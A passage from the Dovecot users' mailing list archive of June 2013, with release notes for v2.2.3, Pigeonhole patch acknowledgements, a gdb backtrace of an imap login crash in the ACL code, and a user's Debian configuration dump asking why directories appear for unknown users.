lookup only". >> [...] >> >> Is there really an attempt to make use of the prefetch database? > > Yes. > >> If yes, under which circumstances could it succeed? > > Never with only a userdb lookup. But it's generic code. I guess the debug log entry could be hidden if it disturbs people too much.. Well... there's at least one guy who always gets trapped by such entries. ;-) Best Regards, Axel From tss at iki.fi Mon Jun 17 16:06:36 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 17 Jun 2013 16:06:36 +0300 Subject: [Dovecot] v2.2.3 released In-Reply-To: <1371418917.5513.3.camel@innu.dovecot.net> References: <1371418917.5513.3.camel@innu.dovecot.net> Message-ID: <24387671-7A73-465E-A0E3-587C3C10CB61@iki.fi> On 17.6.2013, at 0.41, Timo Sirainen wrote: > http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz > http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig > > This is a pretty important upgrade for v2.2 users, because of the IMAP > ENVELOPE reply fix. sdbox/mdbox users: Don't upgrade just yet.. It seems it may cause "Extension header update points outside header size" errors that don't fix themselves. (Bug 1: Causing this error in the first place, bug 2: not being able to fix it automatically.) If you're already getting those errors, attached a workaround patch. Probably happens only to POP3 users. I'm not sure yet how to reproduce this. -------------- next part -------------- A non-text attachment was scrubbed... Name: dbox-hdr-resize-kludge.diff Type: application/octet-stream Size: 603 bytes Desc: not available URL: -------------- next part -------------- From rfs9999 at earthlink.net Mon Jun 17 05:31:54 2013 From: rfs9999 at earthlink.net (Rick Sanders) Date: Mon, 17 Jun 2013 02:31:54 +0000 (UTC) Subject: [Dovecot] Mailbox conversion/importing References: <51B5B276.80708@site.mssl.ucl.ac.uk> Message-ID: > A specialised migration tool must be less tested (and perhaps more buggy) > than pop/imap servers that are in use around the world constantly. On the other hand a tool which is specifically built to do IMAP migration can do the job quickly and efficiently. My experience is that a well-designed IMAP Migration tool which has been tested over the years is often the best bet. Just my own 2 cents worth. Rick Sanders rfs9999 at earthlink.net http://www.athensfbc.com/imap-tools From stephan at rename-it.nl Tue Jun 18 09:37:38 2013 From: stephan at rename-it.nl (Stephan Bosch) Date: Tue, 18 Jun 2013 08:37:38 +0200 Subject: [Dovecot] Patch for pigeonhole 0.4.0 avoiding PATH_MAX In-Reply-To: <1371302696.30815.64.camel@G3620.my.own.domain> References: <1371302696.30815.64.camel@G3620.my.own.domain> Message-ID: <51C00032.10003@rename-it.nl> On 6/15/2013 3:24 PM, Svante Signell wrote: > Hi, > > I recently downloaded and built dovecot-2.2.2 and > dovecot-2.2-pigeonhole-0.4.0 on GNU/Linux and GNU/Hurd. The changes > needed will be sent to the Debian maintainer shortly. Latest Debian > release is 2.1.7-7 and dovecot-2.1-pigeonhole-0.3.1. When building > dovecot-2.2.2 there were no PATH_MAX problems on GNU/Hurd, thank you for > that. However, pigeonhole 0.4.0 had one remaining PATH_MAX construct. > The attached patch solves this problem. It it good enough to be accepted > upstream? (According to the description of t_malloc, free is not needed, > right?) Fixed: http://hg.rename-it.nl/dovecot-2.2-pigeonhole/rev/1b1a0c271383 Regards, Stephan. From stephan at rename-it.nl Tue Jun 18 09:40:10 2013 From: stephan at rename-it.nl (Stephan Bosch) Date: Tue, 18 Jun 2013 08:40:10 +0200 Subject: [Dovecot] Problem redirecting email using pigeonhole 0.4.0 (with patch) In-Reply-To: References: Message-ID: <51C000CA.1010400@rename-it.nl> On 6/8/2013 11:37 PM, Andriy Syrovenko wrote: > Hello, > > Starting from the version 0.4.0 Pigeonhole adds "X-Sieve" and > "X-Sieve-Redirected-From" headers ending them with CR+LF, and then > copies the original message (including original headers) ending the > lines with LF-only. This causes troubles at least if using Exim (I > have not checked with other MTAs)- original message gets dropped, and > only the new pigeonhole-generated headers are sent out. The attached > file fixed the problem for me. Applied: http://hg.rename-it.nl/dovecot-2.2-pigeonhole/rev/e439789e3211 I hope I can restructure LDA mail submission a bit when I finish lib-smtp, avoiding useless conversions between CRLF and LF line endings. Regards, Stephan. From wdehoog at exalondelft.nl Tue Jun 18 10:21:08 2013 From: wdehoog at exalondelft.nl (W. de Hoog) Date: Tue, 18 Jun 2013 09:21:08 +0200 Subject: [Dovecot] doveadm index crashes when indexing shared mailboxes In-Reply-To: References: <51B5BED2.4070500@exalondelft.nl> Message-ID: <51C00A64.8040407@exalondelft.nl> Hi, >> We store our mail archive in a tree of subfolders. I am trying to speed up text searching on our mail archive but when running "doveadm -D -v index -u neil shared/Exalon/Aandeelhouders" the following output is produced: > .. >> doveadm(neil): Panic: file mbox-storage.c: line 711 (mbox_transaction_unlock): assertion failed: (mbox->box.transaction_count > 0 || mbox->mbox_lock_type == F_UNLCK) > > mbox is a pretty difficult format, and I wouldn't recommend using it for anything else than small simple legacy setups. After changing the format to sdbox indexing works. regards, -- Willem-Jan de Hoog From heupink at merit.unu.edu Tue Jun 18 12:32:02 2013 From: heupink at merit.unu.edu (mourik jan SOGo) Date: Tue, 18 Jun 2013 11:32:02 +0200 Subject: [Dovecot] dovecot enterprise release Message-ID: <51C02912.8060502@merit.unu.edu> Hi all, Not sure if this is the right place to ask, but...: On the dovecot enterprise release pages, only debian 6 compatibility is shown. Are there any plans to support wheezy? (as 7 is stable now, and we are running it...) Regards, Mourik Jan From heupink at merit.unu.edu Tue Jun 18 12:36:07 2013 From: heupink at merit.unu.edu (mourik jan SOGo) Date: Tue, 18 Jun 2013 11:36:07 +0200 Subject: [Dovecot] Mailbox conversion/importing In-Reply-To: References: <51B5B276.80708@site.mssl.ucl.ac.uk> Message-ID: <51C02A07.80308@merit.unu.edu> Hi, We have used Rick's tools to migrate from scalix to dovecot, and they worked out incredibly well for us. Also Rick was very responsive to questions and suggestions. I consider it $35 USD well spent. And that's the end of this commercial. ;-) Mourik Jan On 06/17/2013 04:31 AM, Rick Sanders wrote: > >> A specialised migration tool must be less tested (and perhaps more buggy) >> than pop/imap servers that are in use around the world constantly. > > On the other hand a tool which is specifically built to do IMAP migration > can do the job quickly and efficiently. My experience is that a > well-designed IMAP Migration tool which has been tested over the years is > often the best bet. > > Just my own 2 cents worth. > > Rick Sanders > rfs9999 at earthlink.net > > http://www.athensfbc.com/imap-tools > > > From tss at iki.fi Tue Jun 18 12:39:32 2013 From: tss at iki.fi (Timo Sirainen) Date: Tue, 18 Jun 2013 12:39:32 +0300 Subject: [Dovecot] dovecot enterprise release In-Reply-To: <51C02912.8060502@merit.unu.edu> References: <51C02912.8060502@merit.unu.edu> Message-ID: On 18.6.2013, at 12.32, mourik jan SOGo wrote: > Not sure if this is the right place to ask, but...: > > On the dovecot enterprise release pages, only debian 6 compatibility is shown. Are there any plans to support wheezy? (as 7 is stable now, and we are running it?) Wheezy is supported already as well. I guess the web page needs updating. From svante.signell at gmail.com Tue Jun 18 13:25:47 2013 From: svante.signell at gmail.com (Svante Signell) Date: Tue, 18 Jun 2013 12:25:47 +0200 Subject: [Dovecot] Patch for pigeonhole 0.4.0 avoiding PATH_MAX In-Reply-To: <51C00032.10003@rename-it.nl> References: <1371302696.30815.64.camel@G3620.my.own.domain> <51C00032.10003@rename-it.nl> Message-ID: <1371551147.13314.2.camel@s1499.it.kth.se> On Tue, 2013-06-18 at 08:37 +0200, Stephan Bosch wrote: > On 6/15/2013 3:24 PM, Svante Signell wrote: > > Hi, > > > > I recently downloaded and built dovecot-2.2.2 and > > dovecot-2.2-pigeonhole-0.4.0 on GNU/Linux and GNU/Hurd. The changes > > needed will be sent to the Debian maintainer shortly. Latest Debian > > release is 2.1.7-7 and dovecot-2.1-pigeonhole-0.3.1. When building > > dovecot-2.2.2 there were no PATH_MAX problems on GNU/Hurd, thank you for > > that. However, pigeonhole 0.4.0 had one remaining PATH_MAX construct. > > The attached patch solves this problem. It it good enough to be accepted > > upstream? (According to the description of t_malloc, free is not needed, > > right?) > > Fixed: > > http://hg.rename-it.nl/dovecot-2.2-pigeonhole/rev/1b1a0c271383 Thanks a lot :) From heupink at merit.unu.edu Tue Jun 18 14:16:28 2013 From: heupink at merit.unu.edu (mourik jan SOGo) Date: Tue, 18 Jun 2013 13:16:28 +0200 Subject: [Dovecot] dovecot enterprise release In-Reply-To: References: <51C02912.8060502@merit.unu.edu> Message-ID: <51C0418C.5010602@merit.unu.edu> Hi Timo, list, > Wheezy is supported already as well. I guess the web page needs updating. Ah, thanks for the quick reply. MJ From interfasys at gmail.com Tue Jun 18 18:14:52 2013 From: interfasys at gmail.com (=?UTF-8?B?aW50ZXJmYVN5cyBzw6BybA==?=) Date: Tue, 18 Jun 2013 17:14:52 +0200 Subject: [Dovecot] Crashes at login time with freshest code Message-ID: <51C0796C.3020104@gmail.com> Hello, Dovecot keeps crashing at login time. Things were fine on 2.2.2 Fatal: master: service(imap): child 5014 killed with signal 11 Here is the trace: Core was generated by `imap'. Program terminated with signal 11, Segmentation fault. #0 0x00000000105cdfdf in mailbox_list_get_storage (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", storage_r=0x7fffffffe308) at mailbox-list.c:811 811 if (set != NULL && set->driver[0] != '\0') { (gdb) bt full #0 0x00000000105cdfdf in mailbox_list_get_storage (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", storage_r=0x7fffffffe308) at mailbox-list.c:811 set = 0x10a89758 #1 0x00000000108c2876 in acl_backend_vfile_get_local_dir (backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at acl-backend-vfile.c:148 ns = 0x10a5d3c0 list = 0x10a45040 storage = 0xb type = MAILBOX_LIST_PATH_TYPE_DIR dir = 0x10a1a250 "INBOX/spam" inbox = 0x1055dcc0 "\200\334U\020" vname = 0x10a04ab0 "INBOX/spam" error = 0x0 __FUNCTION__ = "acl_backend_vfile_get_local_dir" #2 0x00000000108c2a6c in acl_backend_vfile_object_init (_backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at acl-backend-vfile.c:195 _data_stack_cur_id = 9 backend = 0x10a33a40 aclobj = 0x10a8c380 dir = 0x10a04a68 "\003" vname = 0x10a45258 "\220R\244\020" #3 0x00000000108c05a2 in acl_object_init_from_name (backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at acl-api.c:15 No locals. #4 0x00000000108ca3d7 in acl_mailbox_list_have_right (list=0x10a45040, name=0x10a04a48 "INBOX/spam", parent=false, acl_storage_right_idx=0, can_see_r=0x0) at acl-mailbox-list.c:63 alist = 0x10a45328 backend = 0x10a33a40 idx_arr = 0x10a453f8 aclobj = 0x1ffffe420 ret = 0 ret2 = 10 #5 0x00000000108cad9c in acl_mailbox_list_info_is_visible (ctx=0x10a11040) at acl-mailbox-list.c:336 info = 0x10a110a8 acl_name = 0x10a04a48 "INBOX/spam" ret = 0 __FUNCTION__ = "acl_mailbox_list_info_is_visible" #6 0x00000000108caf36 in acl_mailbox_list_iter_next (_ctx=0x10a11040) at acl-mailbox-list.c:386 _data_stack_cur_id = 8 ctx = 0x10a11040 info = 0x10a4a0c0 ret = 0 #7 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a11040) at mailbox-list-iter.c:941 info = 0x10a110a8 set = 0x10a11110 #8 0x00000000105e44ae in autocreate_iter_next (ctx=0x10a11040) at mailbox-list-iter.c:969 actx = 0x10a11110 info = 0x7fffffffe510 autoboxes = 0x10a45040 autobox = 0x7fffffffe530 count = 4096 __FUNCTION__ = "autocreate_iter_next" #9 0x00000000105e466c in mailbox_list_iter_next (ctx=0x10a11040) at mailbox-list-iter.c:1010 _data_stack_cur_id = 7 info = 0x10a11118 #10 0x00000000108cacd3 in iter_mailbox_has_visible_children (ctx=0x10a10840, only_nonpatterns=false) at acl-mailbox-list.c:299 iter = 0x10a11040 info = 0x10a11118 pattern = 0x10a047c8 prefix = 0x10a04800 "INBOX/*" i = 5 prefix_len = 6 stars = false ret = true __FUNCTION__ = "iter_mailbox_has_visible_children" #11 0x00000000108cade9 in acl_mailbox_list_info_is_visible (ctx=0x10a10840) at acl-mailbox-list.c:345 info = 0x10a108a8 acl_name = 0x10a047a0 "INBOX" ret = 1 __FUNCTION__ = "acl_mailbox_list_info_is_visible" #12 0x00000000108caf36 in acl_mailbox_list_iter_next (_ctx=0x10a10840) at acl-mailbox-list.c:386 _data_stack_cur_id = 6 ctx = 0x10a10840 info = 0x10a490c0 ret = 0 #13 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a10840) at mailbox-list-iter.c:941 info = 0x0 set = 0x0 #14 0x00000000105e44ae in autocreate_iter_next (ctx=0x10a10840) at mailbox-list-iter.c:969 actx = 0x10a10910 info = 0x7fffffffe6b0 autoboxes = 0x2 autobox = 0x10a9b000 count = 0 __FUNCTION__ = "autocreate_iter_next" #15 0x00000000105e466c in mailbox_list_iter_next (ctx=0x10a10840) at mailbox-list-iter.c:1010 _data_stack_cur_id = 5 info = 0x10a1b780 #16 0x00000000105e343b in mailbox_list_ns_iter_try_next (_ctx=0x10a10440, info_r=0x7fffffffe768) at mailbox-list-iter.c:580 ctx = 0x10a10440 ns = 0x1050912c info = 0x10a1b808 error = MAIL_ERROR_NONE errstr = 0x10a47840 "" has_children = false __FUNCTION__ = "mailbox_list_ns_iter_try_next" #17 0x00000000105e36fc in mailbox_list_ns_iter_next (_ctx=0x10a10440) at mailbox-list-iter.c:645 info = 0x0 #18 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a10440) at mailbox-list-iter.c:941 ---Type to continue, or q to quit--- info = 0x417e06 set = 0x7fffffffe7d0 #19 0x00000000105e467e in mailbox_list_iter_next (ctx=0x10a10440) at mailbox-list-iter.c:1012 _data_stack_cur_id = 4 info = 0x2 #20 0x000000000041039c in cmd_list_continue (cmd=0x10a47840) at cmd-list.c:229 ctx = 0x10a47938 info = 0x10a10918 flags = (MAILBOX_NOCHILDREN | MAILBOX_SELECT) str = 0x10a04548 mutf7_name = 0x10a04698 name = 0x10a10c40 "INBOX" ret = 1 #21 0x0000000000410c2c in cmd_list_full (cmd=0x10a47840, lsub=false) at cmd-list.c:463 client = 0x10a47040 args = 0x10a100d8 list_args = 0x104e15a0 arg_count = 32767 ctx = 0x10a47938 patterns = {arr = {buffer = 0x10a47978, element_size = 8}, v = 0x10a47978, v_modifiable = 0x10a47978} ref = 0x10a47968 "" pattern = 0x10a47970 "*" patterns_strarr = 0x10a479b0 str = 0x10a04268 #22 0x0000000000410c81 in cmd_list (cmd=0x10a47840) at cmd-list.c:478 No locals. #23 0x0000000000419e11 in command_exec (cmd=0x10a47840) at imap-commands.c:156 hook = 0x10a22100 ret = false #24 0x0000000000418d59 in client_command_input (cmd=0x10a47840) at imap-client.c:775 client = 0x10a47040 command = 0x7fffffffe950 __FUNCTION__ = "client_command_input" #25 0x0000000000419059 in client_command_input (cmd=0x10a47840) at imap-client.c:836 client = 0x10a47040 command = 0x10a277e0 __FUNCTION__ = "client_command_input" #26 0x0000000000419179 in client_handle_next_command (client=0x10a47040, remove_io_r=0x7fffffffe9dd) at imap-client.c:874 No locals. #27 0x00000000004191f9 in client_handle_input (client=0x10a47040) at imap-client.c:886 _data_stack_cur_id = 3 ret = false remove_io = false handled_commands = false __FUNCTION__ = "client_handle_input" #28 0x000000000041938c in client_input (client=0x10a47040) at imap-client.c:928 cmd = 0x10a21178 output = 0x10a92088 bytes = 19 __FUNCTION__ = "client_input" #29 0x00000000104fc976 in io_loop_call_io (io=0x10a8c2c0) at ioloop.c:387 ioloop = 0x10a21040 t_id = 2 #30 0x00000000104fe46f in io_loop_handler_run (ioloop=0x10a21040) at ioloop-kqueue.c:148 ctx = 0x10a190a0 events = 0x10a50000 event = 0x10a50000 tv = {tv_sec = 1799, tv_usec = 999497} ts = {tv_sec = 1799, tv_nsec = 999497000} io = 0x10a8c2c0 events_count = 6 ret = 1 i = 0 __FUNCTION__ = "io_loop_handler_run" #31 0x00000000104fca19 in io_loop_run (ioloop=0x10a21040) at ioloop.c:406 No locals. #32 0x0000000010493800 in master_service_run (service=0x10a1b140, callback=0x425f06 ) at master-service.c:560 No locals. #33 0x0000000000426220 in main (argc=1, argv=0x7fffffffebe8) at main.c:400 set_roots = {0x42f680 , 0x0} login_set = {auth_socket_path = 0x10a04038 "p@\240\020", postlogin_socket_path = 0x0, postlogin_timeout_secs = 60, callback = 0x425cca , failure_callback = 0x425e92 , request_auth_token = 1} service_flags = MASTER_SERVICE_FLAG_KEEP_CONFIG_OPEN storage_service_flags = MAIL_STORAGE_SERVICE_FLAG_DISALLOW_ROOT username = 0x0 c = -1 Cheers, Olivier From ka at pacific.net Tue Jun 18 18:22:21 2013 From: ka at pacific.net (Ken A) Date: Tue, 18 Jun 2013 10:22:21 -0500 Subject: [Dovecot] v2.2.3 released In-Reply-To: <24387671-7A73-465E-A0E3-587C3C10CB61@iki.fi> References: <1371418917.5513.3.camel@innu.dovecot.net> <24387671-7A73-465E-A0E3-587C3C10CB61@iki.fi> Message-ID: <51C07B2D.5080508@pacific.net> On 6/17/2013 8:06 AM, Timo Sirainen wrote: > On 17.6.2013, at 0.41, Timo Sirainen wrote: > >> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz >> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig >> >> This is a pretty important upgrade for v2.2 users, because of the >> IMAP ENVELOPE reply fix. > > sdbox/mdbox users: Don't upgrade just yet.. It seems it may cause > "Extension header update points outside header size" errors that > don't fix themselves. (Bug 1: Causing this error in the first place, > bug 2: not being able to fix it automatically.) Hi Timo, The latest from http://hg.dovecot.org/dovecot-2.2/ seems to fix the dsync errors I was seeing with 2.2.2. Mostly "Error: Mailbox INBOX sync: mailbox_delete failed: INBOX can't be deleted." Is the extension header bug fixed with yesterday's patch: http://hg.dovecot.org/dovecot-2.2/rev/3056feb418b1 ? Thanks, Ken Anderson > If you're already getting those errors, attached a workaround patch. > Probably happens only to POP3 users. I'm not sure yet how to > reproduce this. > > > > > -- Ken Anderson Pacific Internet - http://www.pacific.net From christian.wiese at securepoint.de Tue Jun 18 18:33:38 2013 From: christian.wiese at securepoint.de (Christian Wiese) Date: Tue, 18 Jun 2013 17:33:38 +0200 Subject: [Dovecot] Crashes at login time with freshest code In-Reply-To: <51C0796C.3020104@gmail.com> References: <51C0796C.3020104@gmail.com> Message-ID: <20130618173338.45744aff@pccw> Hi Olivier, I think I am hitting the same issue on a test machine, but I didn't had the time yet to debug it properly. Is your INBOX/spam folder configured to be auto-created? What mailbox format do you use? (I am using maildir) Cheers, Chris On Tue, 18 Jun 2013 17:14:52 +0200 interfaSys s?rl wrote: > Hello, > > Dovecot keeps crashing at login time. Things were fine on 2.2.2 > Fatal: master: service(imap): child 5014 killed with signal 11 > > Here is the trace: > Core was generated by `imap'. > Program terminated with signal 11, Segmentation fault. > #0 0x00000000105cdfdf in mailbox_list_get_storage > (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", > storage_r=0x7fffffffe308) at mailbox-list.c:811 > 811 if (set != NULL && set->driver[0] != '\0') { > (gdb) bt full > #0 0x00000000105cdfdf in mailbox_list_get_storage > (list=0x7fffffffe310, vname=0x10a04ab0 "INBOX/spam", > storage_r=0x7fffffffe308) at mailbox-list.c:811 > set = 0x10a89758 > #1 0x00000000108c2876 in acl_backend_vfile_get_local_dir > (backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at > acl-backend-vfile.c:148 > ns = 0x10a5d3c0 > list = 0x10a45040 > storage = 0xb > type = MAILBOX_LIST_PATH_TYPE_DIR > dir = 0x10a1a250 "INBOX/spam" > inbox = 0x1055dcc0 "\200\334U\020" > vname = 0x10a04ab0 "INBOX/spam" > error = 0x0 > __FUNCTION__ = "acl_backend_vfile_get_local_dir" > #2 0x00000000108c2a6c in acl_backend_vfile_object_init > (_backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at > acl-backend-vfile.c:195 > _data_stack_cur_id = 9 > backend = 0x10a33a40 > aclobj = 0x10a8c380 > dir = 0x10a04a68 "\003" > vname = 0x10a45258 "\220R\244\020" > #3 0x00000000108c05a2 in acl_object_init_from_name > (backend=0x10a33a40, name=0x10a04a48 "INBOX/spam") at acl-api.c:15 > No locals. > #4 0x00000000108ca3d7 in acl_mailbox_list_have_right > (list=0x10a45040, name=0x10a04a48 "INBOX/spam", parent=false, > acl_storage_right_idx=0, can_see_r=0x0) at acl-mailbox-list.c:63 > alist = 0x10a45328 > backend = 0x10a33a40 > idx_arr = 0x10a453f8 > aclobj = 0x1ffffe420 > ret = 0 > ret2 = 10 > #5 0x00000000108cad9c in acl_mailbox_list_info_is_visible > (ctx=0x10a11040) at acl-mailbox-list.c:336 > info = 0x10a110a8 > acl_name = 0x10a04a48 "INBOX/spam" > ret = 0 > __FUNCTION__ = "acl_mailbox_list_info_is_visible" > #6 0x00000000108caf36 in acl_mailbox_list_iter_next (_ctx=0x10a11040) > at acl-mailbox-list.c:386 > _data_stack_cur_id = 8 > ctx = 0x10a11040 > info = 0x10a4a0c0 > ret = 0 > #7 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a11040) > at mailbox-list-iter.c:941 > info = 0x10a110a8 > set = 0x10a11110 > #8 0x00000000105e44ae in autocreate_iter_next (ctx=0x10a11040) at > mailbox-list-iter.c:969 > actx = 0x10a11110 > info = 0x7fffffffe510 > autoboxes = 0x10a45040 > autobox = 0x7fffffffe530 > count = 4096 > __FUNCTION__ = "autocreate_iter_next" > #9 0x00000000105e466c in mailbox_list_iter_next (ctx=0x10a11040) at > mailbox-list-iter.c:1010 > _data_stack_cur_id = 7 > info = 0x10a11118 > #10 0x00000000108cacd3 in iter_mailbox_has_visible_children > (ctx=0x10a10840, only_nonpatterns=false) at acl-mailbox-list.c:299 > iter = 0x10a11040 > info = 0x10a11118 > pattern = 0x10a047c8 > prefix = 0x10a04800 "INBOX/*" > i = 5 > prefix_len = 6 > stars = false > ret = true > __FUNCTION__ = "iter_mailbox_has_visible_children" > #11 0x00000000108cade9 in acl_mailbox_list_info_is_visible > (ctx=0x10a10840) at acl-mailbox-list.c:345 > info = 0x10a108a8 > acl_name = 0x10a047a0 "INBOX" > ret = 1 > __FUNCTION__ = "acl_mailbox_list_info_is_visible" > #12 0x00000000108caf36 in acl_mailbox_list_iter_next (_ctx=0x10a10840) > at acl-mailbox-list.c:386 > _data_stack_cur_id = 6 > ctx = 0x10a10840 > info = 0x10a490c0 > ret = 0 > #13 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a10840) > at mailbox-list-iter.c:941 > info = 0x0 > set = 0x0 > #14 0x00000000105e44ae in autocreate_iter_next (ctx=0x10a10840) at > mailbox-list-iter.c:969 > actx = 0x10a10910 > info = 0x7fffffffe6b0 > autoboxes = 0x2 > autobox = 0x10a9b000 > count = 0 > __FUNCTION__ = "autocreate_iter_next" > #15 0x00000000105e466c in mailbox_list_iter_next (ctx=0x10a10840) at > mailbox-list-iter.c:1010 > _data_stack_cur_id = 5 > info = 0x10a1b780 > #16 0x00000000105e343b in mailbox_list_ns_iter_try_next > (_ctx=0x10a10440, info_r=0x7fffffffe768) at mailbox-list-iter.c:580 > ctx = 0x10a10440 > ns = 0x1050912c > info = 0x10a1b808 > error = MAIL_ERROR_NONE > errstr = 0x10a47840 "" > has_children = false > __FUNCTION__ = "mailbox_list_ns_iter_try_next" > #17 0x00000000105e36fc in mailbox_list_ns_iter_next (_ctx=0x10a10440) > at mailbox-list-iter.c:645 > info = 0x0 > #18 0x00000000105e4394 in mailbox_list_iter_next_call (ctx=0x10a10440) > at mailbox-list-iter.c:941 > ---Type to continue, or q to quit--- > info = 0x417e06 > set = 0x7fffffffe7d0 > #19 0x00000000105e467e in mailbox_list_iter_next (ctx=0x10a10440) at > mailbox-list-iter.c:1012 > _data_stack_cur_id = 4 > info = 0x2 > #20 0x000000000041039c in cmd_list_continue (cmd=0x10a47840) at > cmd-list.c:229 > ctx = 0x10a47938 > info = 0x10a10918 > flags = (MAILBOX_NOCHILDREN | MAILBOX_SELECT) > str = 0x10a04548 > mutf7_name = 0x10a04698 > name = 0x10a10c40 "INBOX" > ret = 1 > #21 0x0000000000410c2c in cmd_list_full (cmd=0x10a47840, lsub=false) > at cmd-list.c:463 > client = 0x10a47040 > args = 0x10a100d8 > list_args = 0x104e15a0 > arg_count = 32767 > ctx = 0x10a47938 > patterns = {arr = {buffer = 0x10a47978, element_size = 8}, v = > 0x10a47978, v_modifiable = 0x10a47978} > ref = 0x10a47968 "" > pattern = 0x10a47970 "*" > patterns_strarr = 0x10a479b0 > str = 0x10a04268 > #22 0x0000000000410c81 in cmd_list (cmd=0x10a47840) at cmd-list.c:478 > No locals. > #23 0x0000000000419e11 in command_exec (cmd=0x10a47840) at > imap-commands.c:156 > hook = 0x10a22100 > ret = false > #24 0x0000000000418d59 in client_command_input (cmd=0x10a47840) at > imap-client.c:775 > client = 0x10a47040 > command = 0x7fffffffe950 > __FUNCTION__ = "client_command_input" > #25 0x0000000000419059 in client_command_input (cmd=0x10a47840) at > imap-client.c:836 > client = 0x10a47040 > command = 0x10a277e0 > __FUNCTION__ = "client_command_input" > #26 0x0000000000419179 in client_handle_next_command > (client=0x10a47040, remove_io_r=0x7fffffffe9dd) at imap-client.c:874 > No locals. > #27 0x00000000004191f9 in client_handle_input (client=0x10a47040) at > imap-client.c:886 > _data_stack_cur_id = 3 > ret = false > remove_io = false > handled_commands = false > __FUNCTION__ = "client_handle_input" > #28 0x000000000041938c in client_input (client=0x10a47040) at > imap-client.c:928 > cmd = 0x10a21178 > output = 0x10a92088 > bytes = 19 > __FUNCTION__ = "client_input" > #29 0x00000000104fc976 in io_loop_call_io (io=0x10a8c2c0) at > ioloop.c:387 ioloop = 0x10a21040 > t_id = 2 > #30 0x00000000104fe46f in io_loop_handler_run (ioloop=0x10a21040) at > ioloop-kqueue.c:148 > ctx = 0x10a190a0 > events = 0x10a50000 > event = 0x10a50000 > tv = {tv_sec = 1799, tv_usec = 999497} > ts = {tv_sec = 1799, tv_nsec = 999497000} > io = 0x10a8c2c0 > events_count = 6 > ret = 1 > i = 0 > __FUNCTION__ = "io_loop_handler_run" > #31 0x00000000104fca19 in io_loop_run (ioloop=0x10a21040) at > ioloop.c:406 No locals. > #32 0x0000000010493800 in master_service_run (service=0x10a1b140, > callback=0x425f06 ) at master-service.c:560 > No locals. > #33 0x0000000000426220 in main (argc=1, argv=0x7fffffffebe8) at > main.c:400 set_roots = {0x42f680 , 0x0} > login_set = {auth_socket_path = 0x10a04038 "p@\240\020", > postlogin_socket_path = 0x0, postlogin_timeout_secs = 60, > callback = 0x425cca , > failure_callback = 0x425e92 , request_auth_token > = 1} service_flags = MASTER_SERVICE_FLAG_KEEP_CONFIG_OPEN > storage_service_flags = > MAIL_STORAGE_SERVICE_FLAG_DISALLOW_ROOT username = 0x0 > c = -1 > > > > Cheers, > > Olivier From yann.shukor at azurtem.net Tue Jun 18 18:35:57 2013 From: yann.shukor at azurtem.net (Yann Shukor) Date: Tue, 18 Jun 2013 17:35:57 +0200 Subject: [Dovecot] dovecot creating unknown users Message-ID: <51C07E5D.8080302@azurtem.net> Hi We recently installed a dovecot postfix roundcube debian wheezy serverIt is now in production and we are feeling our way as we progressivelyadd new users to this local server. I noticed that dovecot is creating user directory structures for unknown users withinour domain in /var/vmail, even though we have setup a static users.conf db file. I tried omiting the "allow_all_users=yes" parameter but that doesn't seem to be linked to this issue Sorry if this has been asked a number of times already Is there an easy way to search the archives of this mailinglist ? Thanks yann # 2.2.2 (45399357008a): /etc/dovecot/dovecot.conf # OS: Linux 3.2.0-4-686-pae i686 Debian 7.0 ext4 auth_debug = yes auth_mechanisms = plain login auth_socket_path = /var/run/dovecot/auth-userdb auth_verbose = yes disable_plaintext_auth = no first_valid_gid = 5000 first_valid_uid = 5000 hostname = holimail.holinice.com last_valid_gid = 5000 last_valid_uid = 5000 listen = * mail_debug = yes mail_gid = vmail mail_location = maildir:/var/vmail/%d/%n/Maildir mail_privileged_group = mail mail_uid = vmail managesieve_notify_capability = mailto managesieve_sieve_capability = fileinto reject envelope encoded-character vacation subaddress comparator-i;ascii-numeric relational regex imap4flags copy include variables body enotify environment mailbox date ihave namespace inbox { inbox = yes location = maildir:/var/vmail/%d/%n/Maildir mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } prefix = subscriptions = yes } passdb { args = scheme=CRAM-MD5 /etc/dovecot/users.conf driver = passwd-file } passdb { driver = pam } plugin { sieve = ~/.dovecot.sieve sieve_dir = ~/sieve } postmaster_address = azurtem at holinice.com protocols = " imap sieve pop3" service auth-worker { user = $default_internal_user } service auth { unix_listener /var/spool/postfix/private/auth { group = postfix mode = 0666 user = postfix } unix_listener auth-userdb { group = vmail mode = 0600 user = vmail } } service imap-login { group = dovecot inet_listener imap { port = 143 } inet_listener imaps { port = 993 ssl = yes } } service imap { process_limit = 1024 } service pop3-login { inet_listener pop3 { port = 110 } inet_listener pop3s { port = 995 ssl = yes } } service pop3 { process_limit = 1024 } ssl_cert = References: <1371418917.5513.3.camel@innu.dovecot.net> <24387671-7A73-465E-A0E3-587C3C10CB61@iki.fi> <51C07B2D.5080508@pacific.net> Message-ID: <9291E6EE-6735-40E0-B4E4-7F8EF60DE64D@iki.fi> On 18.6.2013, at 18.22, Ken A wrote: >> sdbox/mdbox users: Don't upgrade just yet.. It seems it may cause >> "Extension header update points outside header size" errors that >> don't fix themselves. (Bug 1: Causing this error in the first place, >> bug 2: not being able to fix it automatically.) > > Hi Timo, > The latest from http://hg.dovecot.org/dovecot-2.2/ seems to fix the > dsync errors I was seeing with 2.2.2. Mostly "Error: Mailbox INBOX sync: > mailbox_delete failed: INBOX can't be deleted." Normally that shouldn't happen in the first place! But yeah, that fix was done intentionally. But if INBOX is being deleted all the time with you there's something wrong. > Is the extension header 